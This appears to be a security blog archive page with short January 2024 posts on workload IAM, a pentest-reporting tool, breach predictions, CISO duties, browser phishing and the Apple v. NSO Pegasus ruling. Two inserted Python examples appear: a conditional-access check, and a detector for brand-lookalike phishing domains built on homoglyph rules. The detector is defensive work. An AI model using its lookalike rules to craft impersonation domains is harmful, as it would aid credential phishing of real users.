Jan 31 2024

Wireshark Pen Tester Guide

Category: Information Security, Pen Test | disc7 @ 7:51 am

WireShark Cheat Sheet

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: wireshark


Jan 30 2024

Aembit Announces New Workload IAM Integration With CrowdStrike To Help Enterprises Secure Workload-To-Workload Access

Category: Access Control, Information Security | disc7 @ 3:12 pm

Aembit Becomes the First Workload IAM Platform to Integrate with the Industry-Leading CrowdStrike Falcon Platform to Drive Workload Conditional Access

Aembit, the Workload Identity and Access Management (IAM) platform that enables DevOps and security teams to discover, manage, enforce and audit access between workloads, today announced the availability of a new integration with the industry-leading CrowdStrike Falcon® platform to give enterprises the ability to dynamically manage and enforce conditional access policies based on the real-time security posture of their applications and services.

This integration marks a significant step in Aembit’s mission to help organizations apply Zero Trust principles to workload-to-workload access, making it more secure and easier to manage.

Workload IAM transforms enterprise security by securing workload-to-workload access through policy-driven, identity-based, and secretless access controls, moving away from the legacy unmanaged, secrets-based approach. 

Through this partnership, the Aembit Workload IAM solution checks whether a CrowdStrike Falcon agent is running on the requesting workload and uses that workload’s real-time security posture as an input to its access decisions for applications and data.

With this approach, enterprises can protect their workloads from unauthorized access even as conditions change and access requirements shift. Additional customer benefits from this partnership include:

  • Managed Workload-to-Workload Access: Enforce and manage workload access to other applications, SaaS services, and third-party APIs based on identity and policy set by the security team, driving down risk.
  • Seamless Deployment: Drive consolidation by effortlessly integrating the Aembit Workload IAM Platform with the Falcon platform in a few clicks, providing a unified experience for managing workload identities while understanding workload security posture.
  • Zero Trust Security Model: Embrace a Zero Trust approach, ensuring that every access request, regardless of the source, is verified before granting access rights. Aembit’s solution enforces the principle of least privilege based on identity, policy, and workload security posture, minimizing potential security vulnerabilities.
  • Visibility and Monitoring: Gain extensive visibility into workload identities and access permissions, enabling swift detection and response to potential security threats. Monitor and audit access logs based on identity for comprehensive security oversight.
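
To make the decision described above concrete, here is an added example (illustrative code written for this post, not Aembit’s or CrowdStrike’s software or API) of a fail-closed conditional access check: a policy names which workload identity may reach which target, and a request is allowed only if the source’s EDR posture record is present, fresh, shows the agent running, and carries a risk score under the policy’s limit. The workload names, the risk-score scale, the posture fields and the five-minute freshness window are all assumptions made for the example.

```python
"""Illustrative workload conditional-access check (added example, not vendor code).

Assumptions: workload identities are plain strings, a posture record carries an
agent_running flag, a 0-100 risk score and a timestamp, and a policy binds one
source identity to one target. Any missing or stale posture denies the request.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Optional


@dataclass(frozen=True)
class Posture:
    agent_running: bool         # is the EDR agent alive on the source workload?
    risk_score: int             # assumed scale: 0 = clean, 100 = compromised
    observed_at: datetime       # when the agent last reported this state


@dataclass(frozen=True)
class Policy:
    source: str                 # workload identity allowed to call
    target: str                 # application, database or API being protected
    require_agent: bool         # demand a live agent and a posture check?
    max_risk_score: int         # deny above this score
    max_posture_age: timedelta  # deny if the last report is older than this


@dataclass(frozen=True)
class Decision:
    allow: bool
    reason: str


def evaluate(policy: Policy, source: str, target: str,
             posture: Optional[Posture], now: datetime) -> Decision:
    """Fail closed: identity, policy and posture must all pass."""
    if source != policy.source or target != policy.target:
        return Decision(False, "no policy grants this source access to this target")
    if policy.require_agent:
        if posture is None:
            return Decision(False, "no posture signal for source workload")
        if not posture.agent_running:
            return Decision(False, "EDR agent not running on source workload")
        if now - posture.observed_at > policy.max_posture_age:
            return Decision(False, "posture signal is stale")
        if posture.risk_score > policy.max_risk_score:
            return Decision(False, f"risk score {posture.risk_score} exceeds "
                                   f"limit {policy.max_risk_score}")
    return Decision(True, "identity, policy and posture checks passed")


# Constructed policy: only billing-api may reach ledger-db, and only while healthy.
POLICY = Policy(source="billing-api", target="ledger-db", require_agent=True,
                max_risk_score=30, max_posture_age=timedelta(minutes=5))
NOW = datetime(2024, 1, 30, 15, 0, tzinfo=timezone.utc)


def demo() -> dict:
    """Run a handful of constructed requests through the policy."""
    fresh = NOW - timedelta(minutes=1)
    cases = {
        "healthy":      ("billing-api",   Posture(True, 10, fresh)),
        "no_posture":   ("billing-api",   None),
        "agent_down":   ("billing-api",   Posture(False, 0, fresh)),
        "stale":        ("billing-api",   Posture(True, 10, NOW - timedelta(hours=2))),
        "compromised":  ("billing-api",   Posture(True, 85, fresh)),
        "wrong_source": ("reporting-job", Posture(True, 0, fresh)),
    }
    return {name: evaluate(POLICY, src, "ledger-db", posture, NOW)
            for name, (src, posture) in cases.items()}


if __name__ == "__main__":
    for name, decision in demo().items():
        print(f"{name:13s} allow={decision.allow!s:5s} {decision.reason}")
```

The order of the checks matters: identity and policy are evaluated before any posture data is consulted, so a workload with no grant is denied without leaking whether a posture record exists, and a missing or stale posture record is treated as a failed check rather than as “unknown, allow”.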

This industry-first collaboration builds on the recent CrowdStrike Falcon Fund strategic investment in Aembit, underscoring the global cybersecurity leader’s commitment to fostering innovation within the space. The investment reflects the recognition of the growing demands for securing workload access.

Tags: Aembit, CrowdStrike Falcon, IAM


Jan 30 2024

Faction: Open-source pentesting report generation and collaboration framework

Category: Pen Test | disc7 @ 8:49 am

Josh Summitt, the creator of Faction, has always disliked the process of writing reports, preferring to focus on uncovering bugs. A key frustration for him was the redundant step of using a separate note-taking app for storing screenshots and findings before compiling the final report.

He envisioned an integrated solution where the report generation tool would serve as the note-taking platform, incorporating all the standard templates typically used in reports. He hopes Faction will help others save time, reduce stress, and improve their information security workflow.

“I built Faction to be extendable in ways like you would extend BurpSuite. It’s designed to be flexible and extended to fit seamlessly in any environment. It is easy for internal teams to build and support their small modules versus a large code base. In addition, I hope the project will get a growing list of prebuilt modules developed by the community to expand capabilities without requiring internal development,” Summitt told Help Net Security.

Faction features

With Faction, you can:

  • Streamline penetration testing and security assessment reporting through automation.
  • Facilitate peer review and monitor modifications in reports.
  • Design docx templates for various assessments and follow-up retests.
  • Collaborate in real-time with assessors using the web application and extensions for Burp Suite.
  • Utilize adaptable vulnerability templates featuring 75 pre-filled options.
  • Oversee assessment teams and monitor organizational progress.
  • Monitor the remediation of vulnerabilities with tailored SLA warnings and notifications.
  • Leverage a comprehensive Rest API for seamless integration with other tools.

Other features:

  • LDAP, OAuth 2.0 and SMTP Integration.
  • Extendable with Custom Plugins similar to Burp Extender.
  • Custom Report Variables.

Future plans

The developer is currently working on enhancing the extendability of Faction by introducing a full app store, reminiscent of those found in platforms like Slack and Burp. This expansion will allow for the inclusion of additional features such as custom UI elements.

“Faction has had a strong focus on penetration testing from an application security mindset. I want to expand that to be more Red and Blue Team inclusive. Not that it won’t work for these teams out of the box but it could be more flexible,” Summitt added.

Faction is available for free on GitHub.

More open-source tools to consider:

Burp Suite Cookbook: Web application security made easy with Burp Suite

To explore Pen Testing

Tags: Pen testing, Pen testing report


Jan 29 2024

Cybercriminals embrace smarter strategies, less effort

Category: Cyber crime, Cybercrime | disc7 @ 8:20 am

2024 is shaping up to be a record-breaking year for data breaches, according to Experian. Despite 2023 being labeled as a ‘successful’ year for malicious actors, the upcoming months may bring forth developments that could further disrupt the cybersecurity landscape.

Supply chain vulnerabilities amplified

Third-party data breaches have made headlines, and there is no question why: with more data collected, stored, and moved, there are plenty of partners down the supply chain to target. We predict attacks on systems four, five, or six degrees removed from the source, as vendors outsource data and technology solutions to another provider, which outsources again, and so on.

Digital transformation is expanding threat surfaces. SaaS platforms and public cloud infrastructure push the perimeter out into the internet itself, putting users at greater risk.

When trying to achieve a goal, it is said that small steps can lead to big results. Attackers can apply the same rule. Instead of making a drastic move for an instant payoff, as with ransomware, bad actors may manipulate or alter the tiniest pieces of data to stay under the radar, such as changing a currency rate or adjusting transport coordinates: changes that are hard to notice but can have a major impact.

The major state sponsors of attacks are widely known, and a new country in South Asia, with its large population of engineers and programmers, may join the international stage. Reportedly it has so far focused its cyberattacks regionally because of political tensions, but it may broaden its sights in the future.

Terbium and other rare-earth elements, along with silicon wafers, are the building blocks of today’s hardware and are rapidly becoming some of the most sought-after resources on the planet. Any disruption to an already strained supply chain could send the industry, and the economy that relies on these materials, spinning.

This presents an intriguing opportunity for threat actors seeking mass disruption or nations looking to corner markets.

“Cybercriminals are continually working smarter, not harder,” said Michael Bruemmer, VP, Global Data Breach Resolution at Experian. “They are leveraging new technologies like artificial intelligence and applying their talents in different ways to be more strategic and stay a step ahead. Organizations should not ignore even the slightest security abnormalities and be more aware of what global interests may make them a target.”

Winning from the inside

Like drug cartels, cybergangs are forming sophisticated organizations, because joining forces with like-minded actors is highly advantageous. This spans the globe, with countries potentially helping each other to advance common goals and interests. We will see more hackers for hire, crews looking to expand their monopolies, and cyberwarfare alliances.

In 2024, enterprising threat actors may target more publicly traded companies to obtain non-public information for trading on the stock market, or to plan an attack and sell their holdings before the share price nosedives. Rather than breach an organization and trade stolen data in the underground, threat actors could use data extraction and their talents in plain sight, as everyday investors.

“Today, perpetrators can come from anywhere in the world and bring with them robust resources and expertise,” added Jim Steven, Head of Crisis and Data Response Services at Experian Global Data Breach Resolution in the United Kingdom. “There are many global crime syndicates and nation-backed operations, so companies need to invest in sophisticated prevention and response methods to protect themselves.”

Learn how to access the dark web safely and not fall victim to cybercrime

Tags: Cybercriminals


Jan 26 2024

What are the Common Security Challenges CISOs Face?

Category: CISO, vCISO | disc7 @ 7:35 am

Chief Information Security Officers (CISOs) hold a critical and challenging role in today’s rapidly evolving cybersecurity landscape. Here are the common security challenges CISOs face…

As organizations increasingly rely on technology to drive their operations, CISOs face complex security challenges that demand their expertise and strategic decision-making.

These challenges arise from the constant emergence of sophisticated cyber threats, the need to protect sensitive data, and the ever-evolving regulatory landscape.

The role of a CISO requires balancing proactive risk mitigation with the ability to respond swiftly to incidents and breaches.

This article will delve into the top challenges CISOs face, including protecting digital assets, managing security incidents, ensuring compliance, dealing with insider threats, and the relentless pursuit of cyber resilience.

By understanding these challenges, CISOs can develop robust cybersecurity strategies and lead their organizations toward a secure and resilient future.

Who is a CISO?

A Chief Information Security Officer (CISO) is a senior executive responsible for overseeing and administering an organization’s information security program.

A CISO’s primary responsibility is safeguarding the confidentiality, availability, and integrity of an organization’s information assets and systems.

They are accountable for creating and enforcing strategies, policies, and procedures to defend against cyber threats, protect sensitive data, and mitigate security risks.

CISOs play a crucial role in maintaining an organization’s security posture by establishing and enforcing security standards, conducting risk assessments, and implementing appropriate security controls.

They collaborate with other executives, IT teams, and stakeholders to align security initiatives with business objectives and ensure that security measures are integrated into the organization’s operations.

In addition to their technical expertise, CISOs often engage in risk management, incident response planning, security awareness training, and compliance with regulatory requirements.

They stay updated on the latest cybersecurity trends, threats, and technologies to address emerging risks and implement appropriate security measures effectively.

The role of a CISO has become increasingly important as cyber threats evolve in complexity and frequency.

CISOs are responsible for safeguarding the organization’s sensitive information, maintaining the trust of customers and stakeholders, and ensuring business continuity in the face of cybersecurity challenges.

What are the Roles and Responsibilities of a CISO?

  1. Developing and Implementing Information Security Strategy: The CISO is responsible for developing and implementing an overarching information security strategy aligned with the organization’s business objectives. This includes setting security goals, defining security policies and procedures, and establishing risk management frameworks.
  2. Leading the Security Team: The CISO manages and provides leadership to the security team, including hiring, training, and supervising security personnel. They ensure the team has the necessary skills, resources, and support to carry out their responsibilities effectively.
  3. Overseeing Security Operations: The CISO oversees day-to-day security operations, including incident response, vulnerability management, threat intelligence, and security monitoring. They ensure appropriate controls, technologies, and processes are in place to protect the organization’s assets.
  4. Risk Management: The CISO is responsible for identifying and assessing security risks to the organization’s information systems and assets. They develop and implement risk management strategies to safeguard critical data and systems, including risk mitigation, transfer, and acceptance.
  5. Compliance and Regulatory Requirements: The CISO ensures that the organization complies with relevant security regulations, industry standards, and legal requirements. They stay updated on emerging regulations and ensure appropriate controls and processes are in place to meet compliance obligations.
  6. Security Incident Response: The CISO leads the organization’s response to security incidents, including data breaches, malware attacks, and other security breaches. They establish incident response plans, coordinate efforts, and collaborate with relevant stakeholders, such as legal, PR, and law enforcement agencies.
  7. Security Awareness and Training: The CISO promotes a culture of security awareness throughout the organization. They develop and deliver security awareness programs and training initiatives to educate employees on security best practices and minimize human-related security risks.
  8. Vendor and Third-Party Risk Management: The CISO assesses and manages security risks associated with third-party vendors and partners. They establish vendor security requirements, conduct due diligence, and monitor compliance with security standards and contractual obligations.
  9. Security Governance and Reporting: The CISO provides regular reports and updates on the organization’s security posture to executive management, board members, and other relevant stakeholders. They ensure that security metrics and key performance indicators (KPIs) are established to measure the effectiveness of security programs.
  10. Incident Investigation and Forensics: In the event of security incidents, the CISO oversees the investigation and forensic analysis to identify the root cause, assess the impact, and prevent future occurrences. As required, they collaborate with internal and external resources, such as forensic experts and law enforcement agencies.

GLOBAL CISO – STRATEGY, TACTICS, & LEADERSHIP: How to Succeed in InfoSec and CyberSecurity

Security Challenges CISOs Face

CISOs face a number of common security challenges as they strive to protect their organizations’ digital assets and information. Some of the key challenges they encounter include:

  • Sophisticated Cyberattacks: CISOs must defend against increasingly sophisticated cyber threats, including advanced persistent threats (APTs), ransomware attacks, social engineering, and zero-day exploits. These attacks can bypass traditional security measures and require constant vigilance and adaptive security strategies.
  • Insider Threats: CISOs need to address the risks posed by insiders, including employees, contractors, or partners who have authorized access to systems and data. Insider threats can involve accidental data breaches, negligence, or malicious intent, requiring a balance between enabling productivity and implementing controls to prevent unauthorized access or data leakage.
  • Compliance and Regulatory Requirements: CISOs must ensure their organizations comply with industry-specific regulations, such as GDPR, HIPAA, PCI DSS, or SOX, and evolving privacy laws. Navigating complex compliance requirements while maintaining a robust security posture that meets these standards can be a significant challenge.
  • Cloud Security: As organizations increasingly adopt cloud services and infrastructure, CISOs must address the unique security challenges associated with cloud computing. This includes securing data stored in the cloud, managing access controls, and ensuring the security of cloud service providers (CSPs) and their environments.
  • Security Skills Gap: CISOs often struggle to find enough skilled cybersecurity professionals. The industry’s rapid growth and the evolving threat landscape have created high demand for cybersecurity talent, making recruiting and retaining qualified professionals challenging.
  • Third-Party Risk: Organizations rely on third-party vendors and suppliers, introducing potential security risks. CISOs must assess the security posture of third parties, establish contractual security obligations, and monitor their adherence to security standards to mitigate the risk of breaches through these external connections.
  • Security Awareness and Training: Human error remains a significant factor in cybersecurity incidents. CISOs must promote a strong security culture, provide regular training and awareness programs, and educate employees about cybersecurity best practices to minimize the risk of social engineering, phishing attacks, and other user-related vulnerabilities.
  • Incident Response and Recovery: CISOs must develop and test robust incident response plans to manage and recover from security incidents effectively. This involves identifying and containing breaches, conducting forensic investigations, and implementing remediation measures to minimize the impact and prevent future incidents.
  • Emerging Technologies: Adopting technologies like the Internet of Things (IoT), artificial intelligence (AI), and blockchain introduces new security challenges. CISOs must understand the security implications of these technologies, assess risks, and implement appropriate controls to protect against potential vulnerabilities and attacks.
  • Budget and Resource Constraints: CISOs often face budget limitations and the need to prioritize security initiatives. Balancing the allocation of resources to address immediate security needs while investing in long-term security capabilities can be a significant challenge.

The Phantom CISO: Time to step out of the shadow

What Security Compliance Frameworks Should a CISO Follow?

As a Chief Information Security Officer (CISO), there are several security compliance frameworks and regulations that you should consider following, depending on the nature of your organization and its operations. Here are some of the key security compliance frameworks and regulations:

  1. General Data Protection Regulation (GDPR): If your organization deals with the personal data of individuals in the European Union (EU), GDPR sets requirements for the protection, processing, and transfer of personal data. It includes principles for data minimization, consent, data breach notification, and the rights of individuals.
  2. Payment Card Industry Data Security Standard (PCI DSS): PCI DSS applies to organizations that handle credit card information. It sets requirements for securing payment card data, including network security, encryption, access controls, and regular vulnerability assessments.
  3. Health Insurance Portability and Accountability Act (HIPAA): HIPAA applies to organizations in the healthcare industry that handle protected health information (PHI). It establishes requirements for the privacy and security of PHI, including access controls, encryption, risk assessments, and breach notification.
  4. Sarbanes-Oxley Act (SOX): SOX applies to publicly traded companies in the United States. It sets requirements for financial reporting and establishes controls and processes to ensure the accuracy and integrity of financial statements. While not solely focused on security, it includes provisions for protecting financial data.
  5. National Institute of Standards and Technology (NIST) Cybersecurity Framework: The NIST Cybersecurity Framework provides guidelines and best practices for managing cybersecurity risks. It covers risk assessment, security controls, incident response, and continuous monitoring.
  6. ISO 27001: ISO 27001 is an international standard that provides a framework for establishing, implementing, maintaining, and continually improving an information security management system (ISMS). It covers various aspects of information security, including risk management, access controls, incident management, and security awareness.
  7. Federal Information Security Management Act (FISMA): FISMA applies to U.S. federal agencies and sets requirements for securing federal information and systems. It mandates risk assessments, security controls, incident response planning, and continuous monitoring.

Security Challenges CISOs Face in Managing the Security Team

Managing a security team as a Chief Information Security Officer (CISO) requires effective leadership, communication, and coordination. Here are some key aspects to consider when managing a security team:

  1. Establish Clear Roles and Responsibilities: Clearly define the roles and responsibilities of each team member to ensure everyone understands their specific duties and areas of expertise. This clarity helps streamline operations and avoid confusion.
  2. Set Goals and Objectives: Define strategic goals and objectives for the security team aligned with the organization’s overall security strategy. Communicate these goals to the team and regularly track progress to ensure everyone is working towards the same objectives.
  3. Provide Guidance and Mentorship: Offer team members guidance, mentorship, and professional development opportunities. Encourage skill development, certifications, and staying up-to-date with the latest security trends and technologies, and support team members in their career growth.
  4. Foster Collaboration and Communication: Promote a collaborative and open communication culture within the team. Encourage knowledge sharing, cross-functional collaboration, and effective communication channels. Regular team meetings, brainstorming sessions, and updates are valuable for aligning efforts.
  5. Support Decision-Making: Empower team members to make decisions within their areas of responsibility. Provide guidance and support when needed, but encourage autonomy and ownership in decision-making. Foster an environment where team members feel comfortable taking calculated risks.
  6. Establish Incident Response Procedures: Develop clear incident response procedures and ensure the team is well-prepared to handle security incidents effectively. Conduct regular drills, tabletop exercises, and simulations to test and improve the team’s incident response capabilities.
  7. Stay Informed and Adapt: Stay up-to-date with the latest security threats, industry trends, and best practices. Encourage continuous learning and professional development for the team. Adapt security strategies and measures as the threat landscape evolves.
  8. Collaborate with Other Departments: Work closely with other departments, such as IT, legal, HR, and executive management, to ensure security initiatives are aligned with business objectives and integrated into overall organizational operations. Build relationships and foster a culture of security awareness throughout the organization.
  9. Regularly Evaluate and Improve: Regularly evaluate the team’s performance, processes, and procedures. Collect feedback from team members and stakeholders to identify areas for improvement. Implement changes and adjustments as necessary to enhance the team’s effectiveness and efficiency.
  10. Lead by Example: Demonstrate strong leadership skills, integrity, and a commitment to security best practices. Lead by example in adhering to security policies and procedures. Encourage a positive and supportive work environment.

The CISO Evolution: Business Knowledge for Cybersecurity Executives

Final Thoughts 

CISOs face many common security challenges as protectors of their organization’s digital assets and information.

From sophisticated cyberattacks and insider threats to compliance requirements and resource constraints, these challenges highlight the complex and evolving nature of the cybersecurity landscape.

CISOs must navigate these challenges by adopting a proactive and strategic approach to security, leveraging advanced technologies, fostering a strong security culture, and collaborating with stakeholders.

To overcome these challenges, CISOs must stay abreast of emerging threats, continuously evaluate and improve their security measures, and prioritize investments in critical security capabilities.

They must also foster strong partnerships with internal teams, third-party vendors, and industry peers to collectively address security challenges and share best practices.

While the security challenges CISOs face may seem daunting, they also present opportunities for innovation and growth.

By effectively addressing these challenges, CISOs can enhance their organizations’ security posture, safeguard critical assets, and instill confidence in customers and stakeholders.

Ultimately, the role of a CISO requires a comprehensive and adaptable approach to cybersecurity, where staying one step ahead of threats and continuously improving security measures are paramount.

By embracing these challenges, CISOs can help shape a secure and resilient future for their organizations in an increasingly interconnected and threat-filled digital landscape.

Tags: CISO, CISO Chief Information Security Officer


Jan 25 2024

198% Surge In Browser Based Zero-Hour Phishing Attacks

Category: Phishing | disc7 @ 1:23 pm

The digital landscape is under siege. Surging browser-based phishing attacks, a 198% increase in just the second half of 2023, paint a chilling picture of cyber threats outsmarting traditional security. 

Menlo Security’s 2023 State of Browser Security Report unveils this alarming trend, sounding the alarm for organizations and individuals alike.

The Rise Of Evasive Attacks

Gone are the days of easily identifiable phishing scams. 

Cybercriminals are now armed with highly evasive techniques, bypassing conventional defenses like network filters and email scanners. 

These Highly Evasive Adaptive Threats (HEAT), which make up 30% of all browser-based attacks, employ tactics such as:

  • SMS Phishing (Smishing): Luring victims with seemingly legitimate text messages.
  • Adversary in the Middle (AITM): Intercepting and manipulating web traffic on the fly.
  • Image-Based Phishing: Delivering the lure text as an image so that text-based scanners have nothing to match.
  • Brand Impersonation: Mimicking trusted websites to steal login credentials.
  • Multi-Factor Authentication (MFA) Bypass: Circumventing a second factor, for example by capturing the authenticated session a successful MFA login produces.
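
As an added example for this post (illustrative code, not Menlo’s technology or anything from the report), here is a small detector that runs the brand-impersonation and trusted-host tactics above against a few constructed web-proxy log lines: it flags registrable domains that look like a known brand after undoing common homoglyph swaps (0 for o, 1 for l, rn for m), brand names tucked into a subdomain or path of an unrelated host, and lets allowlisted first-party domains through. The brand list, the allowlist, the log format and the two-label registrable-domain rule are assumptions; a real deployment would use the Public Suffix List and decode punycode (xn--) hosts before comparing.

```python
"""Brand-impersonation and third-party-host phishing detector over constructed
proxy logs (added example, not from the report or any vendor product).

Assumptions: the log format "user=<u> url=<url>", a four-brand watch list, an
allowlist of first-party domains, and a naive "last two labels" registrable
domain rule (no Public Suffix List, no punycode decoding).
"""
import re
from urllib.parse import urlparse

BRANDS = ("microsoft", "paypal", "okta", "google")          # assumed watch list
LEGIT_DOMAINS = {"microsoftonline.com", "microsoft.com",    # assumed allowlist
                 "paypal.com", "okta.com", "google.com"}
# Common lookalike substitutions, undone before comparison. The rn->m and
# vv->w rules can mangle ordinary words, so this is a heuristic, not a proof.
HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"),
              ("3", "e"), ("5", "s"), ("@", "a")]
LOG_RE = re.compile(r"user=(?P<user>\S+) url=(?P<url>\S+)")

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    "2024-01-25T10:01:02Z user=alice url=https://login.microsoftonline.com/common/oauth2",
    "2024-01-25T10:03:15Z user=bob url=https://micros0ft-login.example-hosting.net/auth",
    "2024-01-25T10:04:40Z user=carol url=https://paypa1.com/signin",
    "2024-01-25T10:05:02Z user=dave url=https://cdn.example-sharing.com/files/okta-login.html",
    "2024-01-25T10:06:11Z user=erin url=https://docs.google.com/document/d/abc",
    "2024-01-25T10:07:30Z user=frank url=https://micosoft.com/login",
]


def normalize(text: str) -> str:
    """Lowercase and undo homoglyph substitutions."""
    out = text.lower()
    for glyph, plain in HOMOGLYPHS:
        out = out.replace(glyph, plain)
    return out


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; catches one-character typo-squats like micosoft."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_domain(host: str) -> str:
    """Naive two-label rule (assumption: no Public Suffix List handling)."""
    labels = host.split(".")
    return ".".join(labels[-2:])


def classify(url: str) -> list:
    """Return human-readable findings for one URL; empty list means nothing flagged."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    reg = registrable_domain(host)
    if reg in LEGIT_DOMAINS:
        return []                                # first-party host, nothing to flag
    findings = []
    labels = host.split(".")
    sld = labels[-2] if len(labels) >= 2 else labels[0]
    norm_sld = normalize(sld)
    for brand in BRANDS:                         # lookalike registrable domain
        if brand in norm_sld or edit_distance(norm_sld, brand) <= 1:
            findings.append(f"lookalike domain: {reg} resembles {brand}")
    subdomain = normalize(".".join(labels[:-2]))
    for brand in BRANDS:                         # brand hidden in a subdomain
        if brand in subdomain:
            findings.append(f"brand in subdomain: {brand} under unrelated domain {reg}")
    path = normalize(parsed.path)
    for brand in BRANDS:                         # lure hosted on a third-party site
        if brand in path:
            findings.append(f"brand lure on third-party host: {brand} in path on {reg}")
    return findings


def scan(lines) -> list:
    """Run classify() over log lines, keeping only lines with findings."""
    hits = []
    for line in lines:
        match = LOG_RE.search(line)
        if not match:
            continue
        findings = classify(match["url"])
        if findings:
            hits.append({"user": match["user"], "url": match["url"], "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["user"], hit["url"])
        for finding in hit["findings"]:
            print("   ", finding)
```

Run stand-alone it reports bob, carol, dave and frank and stays quiet on the two first-party URLs. The allowlist is doing real work here: without it, docs.google.com would trip the substring rule, which is also why brand-owned domains such as content-delivery hosts need to be enumerated rather than guessed.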

Traditional security, built for known threats, stumbles against the lightning speed of zero-hour attacks. 

Menlo observed more than 11,000 of these novel, zero-hour phishing campaigns in a single 30-day window; they exploit the vast and vulnerable attack surface of modern browsers.

Worryingly, 75% of these attacks hide on trusted websites, cloaked in a veneer of legitimacy.

Despite technological advancements, the human element remains the weakest link. 

Phishing preys on our inherent trust and cognitive biases, tricking us into divulging sensitive information. 

This makes browser security the ultimate line of defense, protecting users at the point of interaction with the web.

Menlo Security: Shining A Light On The Dark Web

The report paints a stark picture, but not a hopeless one. Menlo Security offers a beacon of hope with its advanced browser security solutions.

Leveraging cutting-edge AI and machine learning, Menlo’s technology detects and thwarts even the most sophisticated evasive attacks.

Key Takeaways for a Safer Web:

  • Evasive threats demand a new approach: Traditional security falls short. Look to advanced browser security solutions powered by AI.
  • Zero-hour attacks lurk everywhere: Don’t let trusted websites lull you into a false sense of security. Remain vigilant and practice safe browsing habits.
  • Your browser is the frontline: Prioritize comprehensive browser security to shield yourself from evolving cyber threats

David Miller, Policy Advocate: “This report calls for increased collaboration between cybersecurity researchers, technology companies, and policymakers. We need to share threat intelligence, develop best practices, and create regulatory frameworks that incentivize stronger browser security measures.”

Organizations should adopt effective incident response plans, regularly monitor email traffic for anomalies, and stay current on emerging threats in order to keep ahead of the evolving email threat landscape.

Phishing Attacks and Detection

Phishing for Phools: The Economics of Manipulation and Deception

Tags: phishing


Jan 25 2024


US judge rejects spyware developer NSO’s attempt to bin Apple’s spyware lawsuit

Category: Spyware | disc7 @ 8:05 am

Judge says anti-hacking law fits Pegasus case “to a T”

https://www.theregister.com/2024/01/24/us_judge_rejects_pegasus_spyware/

A US court has rejected spyware vendor NSO Group’s motion to dismiss a lawsuit filed by Apple that alleges the developer violated computer fraud and other laws by infecting customers’ iDevices with its surveillance software.

Apple sued NSO, developer of the notorious Pegasus spyware, back in November 2021 and asked the court to permanently ban NSO from using any Apple software, services, or devices. The lawsuit alleges that the company violated the US Computer Fraud and Abuse Act (CFAA), California’s Unfair Competition Law, and the terms of use for Apple’s own iCloud when its spyware was installed on victims’ devices without their knowledge or consent. NSO now must answer Apple’s complaint by February 14.

Pegasus infected Apple customers’ devices via a zero-click exploit called FORCEDENTRY, according to Cupertino. Once on a phone, the spyware lets its operators snoop on calls and messages and access the camera and microphone without the owner’s permission.

Despite the surveillance-software maker’s claims that it only sells to government agencies, and even then, only to investigate terrorism or other serious crimes, the software has repeatedly been used to spy on journalists, activists, political dissidents, diplomats and government officials. This has led to US sanctions against the company and several lawsuits.

Last March, NSO asked the court to toss Apple’s lawsuit, arguing that Cupertino should be required to sue the developer in Israel, its home jurisdiction. It also claimed that Apple can’t sue over CFAA violations because the iGiant itself didn’t suffer any damages or loss [PDF].

The court, in its ruling on Monday, dismissed these arguments, noting that “the anti-hacking purpose of the CFAA fits Apple’s allegations to a T, and NSO has not shown otherwise.”

“A ‘loss’ is ‘any reasonable cost to any victim, including the cost of responding to an offense, conducting a damage assessment, and restoring the data, program, system, or information to its condition prior to the offense, and any revenue lost, cost incurred, or other consequential damages incurred because of interruption of service’ … That is precisely the loss Apple has alleged here,” the judge continued [PDF].

When asked about the judge’s ruling, an NSO Group spokesperson said the software maker will fight on.

“The motion to dismiss is part of the legal process in this case,” the NSO spokesperson told The Register. “The technology in question is critical to law enforcement and intelligence agencies in their efforts to maintain public safety. We are confident that once the arguments are presented, the Court will rule in our favor.”

Apple, meanwhile, took the win, and a spokesperson told The Register that this lawsuit is just one of the ways the iGiant is fighting back against spyware vendors.

These include the new Lockdown Mode security feature, the threat notifications it sends to users who may be targets in nation-state attacks, and a $10 million grant to support civil society organizations that research spyware threats and conduct advocacy on the topic through the Ford Foundation.

How a Spy in Our Pocket Threatens the End of Privacy, Dignity, and Democracy

Global Spyware Scandal: Exposing Pegasus

Pegasus Spyware – ‘A Privacy Killer’

CyberWar, CyberTerror, CyberCrime and CyberActivism


Tags: NSO Group, Pegasus spyware


Jan 24 2024

SYSTEM HACKING, SCRIPTING, AND OTHER CONTRONYMS IN CYBERSECURITY

Category: cyber security,Hacking | disc7 @ 8:49 am

The cybersecurity field continuously generates new terms and concepts as it evolves. It also repurposes words to describe new concepts. There’s a never-ending flow of jargon that some refer to as an alphabet soup of complexity. From NGAV to XDR, it appears unlikely that cybersecurity will run out of new acronyms and terminology.

Meanwhile, some popular cybersecurity terms can have contradictory meanings. These are the so-called contronyms, which add some spice to the blandness of tech terms. Here is a list of well-known cybersecurity words and phrases that many readers probably think they already understand, but whose other meanings may surprise them.

HACKING

Most people tend to equate hacking to cybercrime, an attempt to illegally access, damage, or take over a computer system. This is not surprising given that most news articles that mention hacking use the term in its negative connotation, referring to cyber attacks aimed at bypassing access controls or security measures to prevent the unauthorized use of IT resources.

However, hacking can mean something positive or useful. In cybersecurity, system hacking can refer to an authorized effort to break existing security measures to test their effectiveness and spot weaknesses. The term often used for this action is “ethical hacking,” but hacking by itself is neither good nor bad. It’s how it is used that spells the difference.

Malicious and ethical hacking follow the same stages and use similar techniques, from password cracking and phishing to the deployment of rootkits and trojans, the exploitation of buffer overflows, privilege escalation, and the use of keyloggers. In the ethical case, these same steps and techniques are used to exploit vulnerabilities and expose security weaknesses so that they can be plugged or resolved.

PATCHING 

In contrast to hacking, patching is often perceived as a positive term. It is mostly known as the application of a software patch to address a vulnerability or add new functions. Software publishers regularly release patches for their software in response to developments in the cyber threat landscape and to provide improvements in their software products.

